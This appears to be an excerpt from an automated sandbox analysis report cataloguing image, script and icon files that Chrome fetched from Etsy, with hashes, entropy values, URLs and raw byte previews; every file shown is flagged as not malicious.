                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X.."........................................O.........................!1A.."Qaq.2....#BR...3b..$r..CS.....%s.c..4D...EUd.................................9.......................!1.AQ."aq..2BR.#b.....$r.3C..S..............?..0...9...9..........\.1.@98.#...L.SA.B;.\GS........+..1..#......p:.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):3190
                                                                                                                                                                              Entropy (8bit):7.829911050643792
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:950051A7B19FD53F14F6171472CD9883
                                                                                                                                                                              SHA1:3B31787EB5C1525B719BAF363BDBC0CDBDC84FAF
                                                                                                                                                                              SHA-256:FD7A38FCBA18EA948584909BB3594A724A062096F49DA69B95ABDDCEE6350E2C
                                                                                                                                                                              SHA-512:ACD0150E24F3EB2CD8DA1CAB215E769E05A9F9A03FBCE5390D73EA48530916503688CEBC2B4F7EA8F696B6723606EF920FE34F97F563AB494A2BB7D1BC56841A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/23824347/r/il/67d7f1/5200553974/il_300x300.5200553974_4yjs.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................h...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma..................pmdat....."%r....4 2.......q@.g........ ......:@.....J.~n......\..............+..S...0R.R'.z.tK......8P...u...*..$7.@........~......{..j...NQ.....n.v ../.!..r.......;....\... ..*....8....." .W....._......V..;K2.&..Xa.....,....N.F....^.....S.....&...A.C...f......IXJ1..+...2`.L..9.....&..3..5..t..../...n`...<..*...I.@*.ylG....C....qG@.'....G.E..(..J..-.0..|...w.`..a.Qh....c.pUs.j.M...0.b..$.%.....]#{.vz.!../w..t6.za.30.A...W.y.I..V..7fP7#V.~..=&.bm...6]$.....5....Jd{z{...i..Q".MeFa...g.z,6..9.h.\...n.f.I>............'8.*..#...?P45.L.iW#..R...v....]f..8.!..(.:n..Bx...v>.}."...7.....-..U..`../...B&...n]0....t....1._...Je.J.qE3...'.<.y>.E)n>.......['R.....&.wC.b..].7......Y.p.....xv.,D..{..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):67245
                                                                                                                                                                              Entropy (8bit):7.996629313963216
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C5391CA8CE87EC9AF2C89EA780008EED
                                                                                                                                                                              SHA1:95A03FDCCBAC9642071C9A88A9BDEEE344D9F0E8
                                                                                                                                                                              SHA-256:C2E0E7CCDE3A5E3A188E1FC2B9E550E163567536F5061BF8557EC3E9CDE6B7E2
                                                                                                                                                                              SHA-512:2302C1B95265D6061424EC7FA1A156D0938F8BB125F81CD42A829C044F79ED1B5713879ADED511B337DABE93C2B2A2AE8D1BE3426F1A30C7CA42934F78787A1A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/687814/5621642756/iap_600x600.5621642756_aqcnmtx7.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2....p.E.Q@........6.>...s.)....~...u.&.!.....K}.'Z.....$U.......5NW.S......=._......r....h.~w.#..7.B.X..v....D.j....n/&....#.v..I..akN..wnq.O6..~..e....wSl. .D...v....4..|.+.....R|.....tS....D.tv@ma'D.#......q....g.im....k....... Y../..4.Y.......+4.=...&.s....KQC.)V.V9...W.x...1(D:.y..lj...>*`.0......h....U.k...w.g5.,.1.i.......#.....!.T.,|...\..=. \....lN_Q.y.Gm.i.S.....NiO.. ^}Y..zZ..~...*A....f...\.rz.T&..6..w.G..T*.N..&...4.}.=a..E]..|..%Q.....8s.^V.~....#p.J.e.|.z..-.$....\..By_..t.7..`.SV..M......x.....Vr..%x.X9.v.6..:... .O...>a.&j(.~.T3i.J....]&......+....1....d...l^.....lq..-..!.....a0...i...'.2....W.#.~;}.Aw....:Lv.f..g....^....C0H.S...`.........S....H.H.r....t.N.'..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 340x270, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):8394
                                                                                                                                                                              Entropy (8bit):7.9759948629617465
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8B96F277E9690276C72AD513BB63C4C6
                                                                                                                                                                              SHA1:5350C5241401D764E5D9D76109A9DB55D34ED163
                                                                                                                                                                              SHA-256:78C6E31DCF9086A9A7B5C82E36C54FD1BB153573FDC6FC4C25FD00B4B131F899
                                                                                                                                                                              SHA-512:E1C4DDECEB5621CB12745B39C78656D0FF49088087FB34082645754A1186005FD4F51F253A59E0928EA679BA9DE8D8EC32E8AF8A009D61272D5E021223483EC7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18137329/c/2931/2329/0/87/il/01fc80/3071144428/il_340x270.3071144428_1msx.jpg
                                                                                                                                                                              Preview:RIFF. ..WEBPVP8 . .......*T...>.@.J.#.$..z....in............6.E.Y....o....`<..w.p).....k.g...}'.............q......u.9.....^........g..._.~V...?...>.~..g....F.^..;...{.o.w..n..x.}..........?.{..Q.......?....G..............~..%....".....!....o"...^....AY....^.0....v6.R...h..-.<{L...V.......3U:..L.9......P.L....>.4.......X....*..w...T....Vx...... 3.hh....R..../@..w...S..z/b.[E,...Y/.*...hW...(K.w_..c-J...>w".j$Sc...).=z...q?.#..kt0_..*..]>.]D.I.7..`...C.;......a...bg..vk.~...........o+..@x.J..u.o...b...w..........iy...._...1..._E..^,....C......~.!..........[.?=`.......0....[.Q.......t.hmo..e.U.u:...FJ..s.!0...c[.tUL....EB..b!......j.r..k..U....x...zy..g.u... ...'....b..QK.y.8W....be1y..N.Q.?.B....#.}.........@.X./=..G.9[\...4.t..we.t.V..`..6......*.:..TA2..HB....._I.]D........t...5...rl.........;....V6.'.;...)WA7AQ......>OB..G...-.vs.....e=u..PR...+'....f:...T{v}......9rq;awB....^...(..(G.@H..?......-u>...34...|E..VA..\..*G..i._;.V9;...#.G.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):99
                                                                                                                                                                              Entropy (8bit):4.5394848792718685
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F051901D791D9D3AC32062C7E5763773
                                                                                                                                                                              SHA1:348A7EBA58B37750ED9C09AF6584B548E5A20F16
                                                                                                                                                                              SHA-256:A403FF8DBB3E663474E70CCCFFA02BCD6B57956B63D06A397A1721C3B60ADA8E
                                                                                                                                                                              SHA-512:8D8B3A64C5B1EE5704FD4F00A9018212025872D5678F7A8498A59EB354C76B645C58189E791FB5447D6FCD49D20EBA11232A95FBFCE3A71C6E0272F8761B5034
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/paula/v3/polyfill.min.js?etsy-v=v5&flags=gated&features=AbortController%2CDOMTokenList.prototype.@@iterator%2CDOMTokenList.prototype.forEach%2CIntersectionObserver%2CIntersectionObserverEntry%2CNodeList.prototype.@@iterator%2CNodeList.prototype.forEach%2CObject.preventExtensions%2CString.prototype.anchor%2CString.raw%2Cdefault%2Ces2015%2Ces2016%2Ces2017%2Ces2018%2Ces2019%2Ces2020%2Ces2021%2Ces2022%2Cfetch%2CgetComputedStyle%2CmatchMedia%2Cperformance.now
                                                                                                                                                                              Preview:/* Polyfill service v4.6.0. * Disable minification (remove `.min` from URL path) for more info */..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):92670
                                                                                                                                                                              Entropy (8bit):7.996683780300896
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:FD175A6F6519860E1947BEF136BD9BB1
                                                                                                                                                                              SHA1:CCC81C2D47FA9C6BDB9E32528BBA5BB91ABC41CE
                                                                                                                                                                              SHA-256:A8BCD76698921B700DB56FFD3145AB6A8BD96B88ACE19A61F7B8E2260E4C372E
                                                                                                                                                                              SHA-512:56FF29AB8A1A24302AB9B523A53AAC2B0F7B654715112F7C6D58BA7BF0F5EF6FB1F55EC9B752AF760AAFA97C6D2E77074E4327411128AC7DE49C3AB8853E9EC8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18859311/c/1179/1179/0/105/il/ae7305/6065088423/il_600x600.6065088423_9nht.jpg
                                                                                                                                                                              Preview:RIFF.i..WEBPVP8X.... ...W..W..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .g..0....*X.X.>!..B...M.P...Y@/.........~...._..p.........ym................O.'....?.................q.D..........y......?.................=>q.......+........._.=...~..@.u.............=.?..j...g....~=.$..............~....?...}..}...~...../..?P.3...g...........X.7.O.......>....,.O..`o.>.....zr.s.w._...O_.H....t,.`....?.1...."..2.RE...6gV..../5../.`...Ko]...<...{..d.(.A/.*4..1.@=...LR...(}.t....H0wy_..8.V.F|B.A..`z.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):9304
                                                                                                                                                                              Entropy (8bit):7.841304879616511
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:DF66B0BE04286CE004085E8858F4BA4A
                                                                                                                                                                              SHA1:2098477F267C5FEFE8F465DC2074DC25A83DBA48
                                                                                                                                                                              SHA-256:3B5C74604F04A976CE620B7BDC050A8A7B2A404E00881F1C940200803E5E8E69
                                                                                                                                                                              SHA-512:FF155336AFEC816D7E53ED5F1EEDE369B43BAF95B55CC3742109492B857159D64F2E5E43DDFABE473A5D52CED1385E8C3393E0B6A0CC1CD2F9A8A5B9CB16099D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\..........."........................................=.......................!..1AQ.a"q..2.....BR...#S...3br...$s................................0.......................!.1AQ...Raq."2B....b#..............?......@0..<..8.0...........}...apG..^.v&.k.3?.W0..&...UV5..`.J...b..R..+Xu.j....N....a3_Znj
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (57517)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):57761
                                                                                                                                                                              Entropy (8bit):5.303634205125704
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2A24C449920082239F297CFA8CCAF985
                                                                                                                                                                              SHA1:948601390435EE3DB518B699925CFE6E0DCB0BEC
                                                                                                                                                                              SHA-256:4F26FA79B06DA428D79E4311624D182F7B4BC2E8B553CE6575377D6951D7C572
                                                                                                                                                                              SHA-512:4575720F719365044DC11C06CB01685F03C57BB18E8A79A275F431EF864545090467A589405CE1E63E1ED35D6564CB3B084EC2FEE13D669AD3041DD9B1B3EB0A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:// For license information, please see: https://www.etsy.com/ac/evergreenVendor/js/en-US/etsy_libs.5d757f2bb98e91514c0f.js.LICENSE.var etsy_libs_5d757f2bb98e91514c0f;(()=>{var e={1632:(e,t,n)=>{"use strict";n.r(t);n.d(t,{default:()=>a});var r=n(9386);var s=n(7464);var o=n(7217);function a(e,t={}){const n={name:e};const a="/api/v3/ajax/bespoke/member"+(0,s["default"])("/neu/specs/{{name}}",n);const i={};if(t){t.hasOwnProperty("log_performance_metrics")&&(i["log_performance_metrics"]=t["log_performance_metrics"]);t.hasOwnProperty("stats_sample_rate")&&(i["stats_sample_rate"]=t["stats_sample_rate"]);t.hasOwnProperty("specs")&&(i["specs"]=t["specs"]);t.hasOwnProperty("view_data_event_name")&&(i["view_data_event_name"]=t["view_data_event_name"]);t.hasOwnProperty("runtime_analysis")&&(i["runtime_analysis"]=t["runtime_analysis"])}const c=(e,t)=>{var n,r;if(["search_results","async_search_results","listing_async_review_variations","shop-reviews","join_neu_controller"].includes(null!==(n=null==
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1801
                                                                                                                                                                              Entropy (8bit):7.6202703946393715
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7ECB7BDBE5AC8B8646FF5E750F84B5F9
                                                                                                                                                                              SHA1:B45407C0B313AE0452F98451A60E925A63BD1283
                                                                                                                                                                              SHA-256:9D214C7D332C383D2EBDBB8AE33F14B9CA8BB68DABE45A44FFA31A767A7BD258
                                                                                                                                                                              SHA-512:64DF025DC9B48D2CFE1C6689A964348996F37D7EA5A923D9C7509B7E1099D9863DC07264221B2FD148E7D5F56C1DFBDD5FBD135BFDF95AE7AF87DC5D0051F232
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/5908861/r/il/b308b7/1971801298/il_100x100.1971801298_nqo1.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......d...d....pixi............ipma...................mdat........`...B2.....I$.@.7.B.ha..M|1.F\C.e+..G....B.jMl[..#pC}Q?...\w.l.........3?....h........(R.~.....}7}K~\.....u|..\.Y..L.k..n....r.5.j..]..bR...u..B&.+Z.....O.N.........*2Lw... .0.E.?....s.m3..F9H. ...Z~Jyl.z*.D..Z.!.eK.z.`...p...[.O`6.5/...(..\.J..z...K.#....|.eWk.....).*..-.k=..}.@A...6i.@8.B...B...ps....."..;<;=...[.!.s=....c.b....v.Hg~..p.W..W......q..L.6G.6...u.8%..Nh.....eec....%)b.'(.......z.K...E.0.W.%K@....)Yo{..Qu...*..."".,........7.b..S....,IQ.c..)...#.3.&.g.{.E.S.@+...:.....E7..i...b.].z!.9...../.?`.V....}..T......-...a....b.T.1'f.9.=.....3m....pl....l.:B/'._.N.6... A....N..b.;.l..W...A.z..Q..c^Y..Qzs...:.Q!..Tm0......=.4l(.\ZY..j...FC.8..jH.y........c-.:!fU<..:?..a..F.`....`.g
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):120076
                                                                                                                                                                              Entropy (8bit):7.97960764993299
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7944A64656F2664B94C1944B26673758
                                                                                                                                                                              SHA1:2167AA13B2C8DCF2AF0C5B089D14C4E6FEF2D38D
                                                                                                                                                                              SHA-256:CC8622157D8135C729482A8F11DA61E60C5D145D775431E8FA457B4050828895
                                                                                                                                                                              SHA-512:009D0D5BB14E655C445A19279C684C39912CD1B063D63DBC5D0DA57EDDD54FA2A36ED2CFEAC1AEA05295747B1C68C8C7884497463F71B5C07E8FC8A416E4F346
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................S.........................!..1A"Qa..2q.#BR......$3br.C.....%DSs..4c...&5d..Ttu....................................A......................!..1AQ.."aq2......#B..3Rbr....C..$ST.................?....\F.......o.m......i$s.k.0...B..t.8..<N.6(.A...>..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):15278
                                                                                                                                                                              Entropy (8bit):7.982626678057785
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:AC95F46424F3DD440564ABC6B05BC51C
                                                                                                                                                                              SHA1:9B0FC8FC0D4429C7B53BE26D5C16F9D5104B9D86
                                                                                                                                                                              SHA-256:9F7FF2808283903FF010C429AF99B4A3490509AEB7663E56AC7D6DB08F4A0D75
                                                                                                                                                                              SHA-512:F8D4B6583CE9D16DD25F9DE0E466B85CA5A9C25D9E550594A64E231349F7C782E6FF7A8F53FB325E06E5A8892D4871C91DB764D651B39ED12CEE52C158816A61
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/54457829/r/il/dcfa9b/6284993374/il_340x270.6284993374_ab0s.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................:....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma.................:.mdat....."*p...h4 2.u...I$.@.L...Mj=.M.4..Q......9bK....,;;/RH./.M.C.s..^:.eK?...h..`5....F.&.W........AX.....Q.....?...e.....5...s...$.......U.j......ee....N.-.,.u......hy-...D?.b.6...>..o.%#..m+..~$....&.%BB.5....K.... %.{.S.Aux..p.;..7..g..... Z.6.B-&........I.X..>.Z.vq...../.pq.h%....v.[....'.'{S.|%..r..3.>+a..J.D...s`..!.z.0(......Lq$..-..%.b......vd.....{.(UT..Z..Jn.N8........A.... de.)..).,.D..t...e..M|3q....U.x..G.'......*N....J+......[E.=$=k..R.jk&.......l1...A....q....\....K. 4/...+..n:..$D,...e+...&.:...[...I.y/.%j>l'..w.G.=j44.C"....0.c...?y~p7E......+1..u.......2.x..j....(3.....-.?LB........(.5(.3.T.......w.C0.7.}N.Y.6aN*.c.n8.#U4.(.i[.......&..t.j&.Jj.'.KDNs.g...N8C..;".&.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):66669
                                                                                                                                                                              Entropy (8bit):7.970023691783374
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6206C84B80D97D9BF91CC1D5CCCBA1FF
                                                                                                                                                                              SHA1:EFF3A0919E415EBCFDDEB37DFF8D2121E1CB0025
                                                                                                                                                                              SHA-256:4575DFBEE1C28FC0C4714D7AEB75BFCFA4D5B9B69A4FF8984DE3FD3327CF191B
                                                                                                                                                                              SHA-512:CD04358A2879E02EF6504D4C6B479B4E284C1BED703DA2CBC5DC0ECD982E923EDE2F5C56C733D6F828D61A751C607F8F3D983A2FA29D00C48F028283B5565369
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................A.........................!.1A.Q.."aq2..#B....$3Rb....Cr...%...S................................=.........................!1A.Qa."q2..B..#3R....b.r.$.4CDS..............?...M...4.y0....h&.S..+-...I.3.3O.`.g$..I.....'.:.n(<.....<...1..1.'5......!a
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                              Entropy (8bit):4.3467658083034815
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BE03E73235A91AD77C1F04BE68D173DF
                                                                                                                                                                              SHA1:9A315585E36EEA278C1484EC983620B84B7CDBB8
                                                                                                                                                                              SHA-256:FFA2C6260E45D8F56BA02C76990B7D3BADED83772D98F81AEE98C9D6E3642699
                                                                                                                                                                              SHA-512:BBFB3F404952286E567F473122578B77C80AA0851A77D8D2A25DFBE89ADA986F6274CA83B53D0D3CED06E68FF5C87D069E3C507ED922048BE3FB9798ADE4B59B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/assets/dist/images/listzilla/expand-icon.20200413213051.svg
                                                                                                                                                                              Preview:<svg width="36" height="36" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect width="48" height="48" rx="24" fill="#FFF"/>.<path d="M27.0002 15C26.4472 15 26.0002 15.447 26.0002 16C26.0002 16.553 26.4472 17 27.0002 17H29.5863L25.2932 21.293C24.9022 21.684 24.9022 22.316 25.2932 22.707C25.4882 22.902 25.7442 23 26.0002 23C26.2562 23 26.5122 22.902 26.7072 22.707L31.0002 18.414V21C31.0002 21.553 31.4472 22 32.0002 22C32.5532 22 33.0002 21.553 33.0002 21V15H27.0002Z" fill="#222222"/>.<path d="M21.293 25.2932L17 29.5863V27.0002C17 26.4472 16.553 26.0002 16 26.0002C15.447 26.0002 15 26.4472 15 27.0002V33.0002H21C21.553 33.0002 22 32.5532 22 32.0002C22 31.4472 21.553 31.0002 21 31.0002H18.414L22.707 26.7072C23.098 26.3162 23.098 25.6842 22.707 25.2932C22.316 24.9022 21.684 24.9022 21.293 25.2932Z" fill="#222222"/>.</svg>.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):93087
                                                                                                                                                                              Entropy (8bit):7.997684054343651
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3E7A7B31BD1D1211CF9EED72405F56BC
                                                                                                                                                                              SHA1:201E6DC03F0056D5C35E80971A5C0F88D16FD335
                                                                                                                                                                              SHA-256:FA75BB2E221B1F3E6E6C7E6A4AA7C780DCF18548900AE92765022421C4CBE950
                                                                                                                                                                              SHA-512:40082A8F787032ACE22D399C9E436C742943144C0C817BC4A187C0A0E65E2ED27DA7C34D84333BEF12A809A5EF3AC3E434505D164F975FEDA28FB187E13B8343
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/5805144/r/il/f373ae/4514112830/il_600x600.4514112830_evo5.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................j....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................j.mdat.....&ey_.....2........!@.:...+'..f.p...uIo.D.....`j.j.....U{;..M..,..T@....*=.....lu.4.W..Cv..V2.3.....g...w..2.H....W.......s.-#......F......>)).u.....>..2..........F.~l.'..e.hC`.qN.6..[..C._c..9...G...9...`.o..>3\...{............g..&d\.......S.....S.;......&...i..+9.F;...\...Y........lD.-G2.......&^A.N....#....C..a3.....^..v.^.~,...O.PiC,..I.D8........&k..MM.bTZ...d".w5.~.SW.......wNr...b.._..o.......z.H..rF.?:..f.!.6B.s3\....y......v?mW....S...64..-1.Pf*0...UY..;...D.9..x.@2O.h..qF.z....c........=&.7)....36v.P..)R...+..E.g{W...(...l.._.9&....`.$.U....1.......A.....o.&3..5{.g....|....B?..De..9....(H...ob.J....bf.`.....!8...k...a..j..':..].!..(J.dEX......X...<...i...*......#-.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):4117
                                                                                                                                                                              Entropy (8bit):7.872755664518849
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D515747C883CEA7F95E0CB8CA019A62D
                                                                                                                                                                              SHA1:71808474BC5D8F06482E8211EE219131EE209608
                                                                                                                                                                              SHA-256:80D1ADE19C439EB1B6A04497711B6C118B1B88422CDEA4762B38DF9052966478
                                                                                                                                                                              SHA-512:DB8ADDFFE5D60C78EFF812E1359C6388F6E4E0B0EB4D7C7216AE87A28CEE2618CF88ED7C98492948FF1D0C15A653F13F57A8B6C59331D23426052942B73BFE8C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/6bf6c2/5566094230/il_170x135.5566094230_5mhb.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe................pixi............ipma...................mdat.......a. !..2.......1@.....w..wF~...F...pu.d...U.k..........{..b|...N.N)>...0.N.X.....w.....F.m..av.^..L.....%....x....O...j.....H.....H..]...?.D.r.~.[.7..t3.|...R..}>k....B. ....v...T........V>.....2h..v_4.a.mA...~...N.}S...w.._V~.5............+.1.$.Z....J...V...z...<.3..F....km.....B. [h.'...v.....>H...hh'.20...H.....%.....b..2..2$..3...W.......Q.N...o...z.-........j|..)..x.....V....y......#~2<..^|jr7)P&.I...N...)P.ZM...Y.a...{..].k1.X{?.6.TH.9{g.k. X.p....l....h;..V..4x....9...i.>...<...$a.>...{.&|..S?1-.RP.."A....U..OHX.8...p.B.....q...|.v. .Y.x.,Vw..t....#&*.#%...q.&.E.f..M.....D!c.|DFT`..X`. ...k=.U.]...........O...(.e..7.%.E...%3^.......m..?...<...-f{.....W.^..h....P.m...5.C
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):12671
                                                                                                                                                                              Entropy (8bit):7.892906967373451
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8F878ED612FC4AADE868278F2D1CBB27
                                                                                                                                                                              SHA1:8977E33039133A5E6EFFEB237C60A65429C22E89
                                                                                                                                                                              SHA-256:87AECB061F2F6A4332ED123EA6E247EF9ADC5A5FAC34904332F18D33DC92EF87
